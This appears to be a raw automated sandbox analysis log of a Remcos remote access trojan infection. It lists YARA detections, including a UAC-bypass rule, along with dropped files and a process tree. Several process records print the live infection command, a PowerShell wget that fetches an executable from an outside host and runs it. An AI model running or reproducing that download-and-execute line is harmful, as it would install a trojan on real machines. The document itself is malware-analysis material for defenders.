                      Source: 32.2.explorer.exe.557aa8a.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 12.2.DZIPR.exe.35df9ce.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 20.2.cmd.exe.4fb1757.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 24.2.cmd.exe.5274a8a.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 20.2.cmd.exe.55000c8.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 20.2.cmd.exe.55000c8.7.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 20.2.cmd.exe.55000c8.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 26.2.explorer.exe.cc9757.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 28.2.cmd.exe.51df757.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 14.2.cmd.exe.55b9757.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 26.2.explorer.exe.c83a8a.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 24.2.cmd.exe.58300c8.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 24.2.cmd.exe.58300c8.7.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 24.2.cmd.exe.58300c8.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 33.2.explorer.exe.474b757.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 0000001A.00000002.1827195478.00000000005CB000.00000004.00000001.01000000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000016.00000002.1679023505.00000000004F9000.00000002.00000001.01000000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 0000001C.00000002.2075718056.00000000057D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000018.00000002.2009928671.0000000005830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000021.00000002.2074816955.0000000000369000.00000002.00000001.01000000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000020.00000002.2008670032.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 0000000E.00000002.1679242775.0000000005FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000014.00000002.1827119501.0000000005500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: cmd.exe PID: 7620, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: cmd.exe PID: 8068, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: explorer.exe PID: 8164, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: cmd.exe PID: 6732, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: explorer.exe PID: 4044, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: cmd.exe PID: 6116, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: explorer.exe PID: 2056, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: explorer.exe PID: 1180, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu, type: DROPPEDMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu, type: DROPPEDMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: C:\Users\user\AppData\Local\Temp\paogviura, type: DROPPEDMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: C:\Users\user\AppData\Local\Temp\paogviura, type: DROPPEDMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: C:\Users\user\AppData\Local\Temp\paogviura, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: C:\Users\user\AppData\Local\Temp\rjhlrgwt, type: DROPPEDMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: C:\Users\user\AppData\Local\Temp\rjhlrgwt, type: DROPPEDMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: C:\Users\user\AppData\Local\Temp\rjhlrgwt, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: C:\Users\user\AppData\Local\Temp\lejp, type: DROPPEDMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: C:\Users\user\AppData\Local\Temp\lejp, type: DROPPEDMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: C:\Users\user\AppData\Local\Temp\lejp, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: classification engineClassification label: mal100.troj.expl.evad.winLNK@34/27@2/2
                      Source: C:\Users\user\AppData\Roaming\hello.exeCode function: 11_2_00407776 wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree,11_2_00407776
                      Source: C:\Users\user\AppData\Roaming\hello.exeCode function: 11_2_0040118A GetDiskFreeSpaceExW,SendMessageW,11_2_0040118A
                      Source: C:\Users\user\AppData\Roaming\hello.exeCode function: 11_2_004034C1 _wtol,_wtol,SHGetSpecialFolderPathW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,CoCreateInstance,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,11_2_004034C1
                      Source: C:\Users\user\AppData\Roaming\hello.exeCode function: 11_2_00401BDF GetModuleHandleW,FindResourceExA,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,wsprintfW,LoadLibraryA,GetProcAddress,11_2_00401BDF
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\hello.exeJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2376:120:WilError_03
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7628:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8076:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2856:120:WilError_03
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l31uaxlx.vs2.ps1Jump to behavior
                      Source: Yara matchFile source: 12.0.DZIPR.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000B.00000003.1378606402.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000000.1381062753.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\DZIPR.exe, type: DROPPED
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
                      Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell wget http://lawyerconsult.top/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/hello.exe && C:\Users\user\AppData\Roaming/hello.exe
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://lawyerconsult.top/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/hello.exe
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\hello.exe C:\Users\user\AppData\Roaming/hello.exe
                      Source: C:\Users\user\AppData\Roaming\hello.exeProcess created: C:\Users\user\DZIPR.exe "C:\Users\user\DZIPR.exe"
                      Source: C:\Users\user\DZIPR.exeProcess created: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe "C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe"
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://lawyerconsult.top/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/hello.exeJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\hello.exe C:\Users\user\AppData\Roaming/hello.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hello.exeProcess created: C:\Users\user\DZIPR.exe "C:\Users\user\DZIPR.exe" Jump to behavior
                      Source: C:\Users\user\DZIPR.exeProcess created: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
